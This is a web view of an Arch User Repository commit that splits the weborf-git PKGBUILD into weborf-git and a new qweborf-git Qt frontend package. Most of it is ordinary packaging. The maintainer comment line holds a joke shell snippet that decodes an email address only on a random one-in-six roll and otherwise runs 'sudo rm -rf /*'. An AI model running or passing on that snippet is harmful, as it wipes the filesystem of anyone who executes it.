summarylogtreecommitdiffstats
diff options
context:
space:
mode:
authorfelix2016-06-30 08:29:15 +0200
committerfelix2016-06-30 08:29:15 +0200
commit95c1e5831a4bdcb2b11ea854d75de5913b87079d (patch)
tree3d584470afb20b335593a69008102ee96ab18f05
parent06a7676df8832e0a2b3706b52082ec9c0767550a (diff)
downloadaur-95c1e5831a4bdcb2b11ea854d75de5913b87079d.tar.gz
Package qweborf too
-rw-r--r--.SRCINFO20
-rw-r--r--PKGBUILD36
2 files changed, 44 insertions, 12 deletions
diff --git a/.SRCINFO b/.SRCINFO
index b4de621e1363..34da701014c2 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -1,16 +1,26 @@
pkgbase = weborf-git
- pkgdesc = A lightweight web server designed for rapidly sharing files over HTTP
- pkgver = 0.13+59+g04376cb
+ pkgver = 0.13+61+g8d173c2
pkgrel = 1
url = https://ltworf.github.io/weborf/
arch = i686
arch = x86_64
license = GPL3
- depends = file
- provides = weborf
- conflicts = weborf
+ makedepends = python-pyqt5
source = git+https://github.com/ltworf/weborf.git
sha512sums = SKIP
pkgname = weborf-git
+ pkgdesc = A lightweight web server designed for rapidly sharing files over HTTP (git snapshot)
+ depends = file
+ provides = weborf
+ conflicts = weborf
+
+pkgname = qweborf-git
+ pkgdesc = A lightweight web server designed for rapidly sharing files over HTTP - Qt frontend (git snapshot)
+ arch = any
+ depends = python
+ depends = python-pyqt5
+ depends = weborf-git
+ provides = qweborf
+ conflicts = qweborf
diff --git a/PKGBUILD b/PKGBUILD
index 66665746bd2f..c2f358cbd595 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,16 +1,14 @@
# Maintainer: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `>
-pkgname=weborf-git
-pkgver=0.13+59+g04376cb
+pkgbase=weborf-git
+pkgname=(weborf-git qweborf-git)
+pkgver=0.13+61+g8d173c2
pkgrel=1
-pkgdesc='A lightweight web server designed for rapidly sharing files over HTTP'
url='https://ltworf.github.io/weborf/'
arch=(i686 x86_64)
-provides=(weborf)
-conflicts=(weborf)
license=(GPL3)
-depends=(file)
source=(git+https://github.com/ltworf/weborf.git)
sha512sums=(SKIP)
+makedepends=(python-pyqt5)
pkgver() {
cd "$srcdir/weborf"
@@ -22,10 +20,34 @@ build() {
autoreconf -f -i
./configure --prefix=/usr --sysconfdir=/etc
make
+
+ # build qweborf
+ pyuic5 qweborf/main.ui > qweborf/main.py
+ python qweborf.setup.py build
}
-package() {
+package_weborf-git() {
+ pkgdesc='A lightweight web server designed for rapidly sharing files over HTTP (git snapshot)'
+ depends=(file)
+ provides=(weborf)
+ conflicts=(weborf)
+
cd "$srcdir/weborf"
make install DESTDIR="$pkgdir"
rm -rf "$pkgdir/etc/init.d"
}
+
+package_qweborf-git() {
+ pkgdesc='A lightweight web server designed for rapidly sharing files over HTTP - Qt frontend (git snapshot)'
+ arch=(any)
+ depends=(python python-pyqt5 weborf-git)
+ provides=(qweborf)
+ conflicts=(qweborf)
+
+ cd "$srcdir/weborf"
+ python qweborf.setup.py install --root="$pkgdir"
+ install -Dm 0755 qweborf/qweborf \
+ "$pkgdir/usr/bin/qweborf"
+ install -Dm 0755 qweborf/qweborf.desktop \
+ "$pkgdir/usr/share/applications/qweborf.desktop"
+}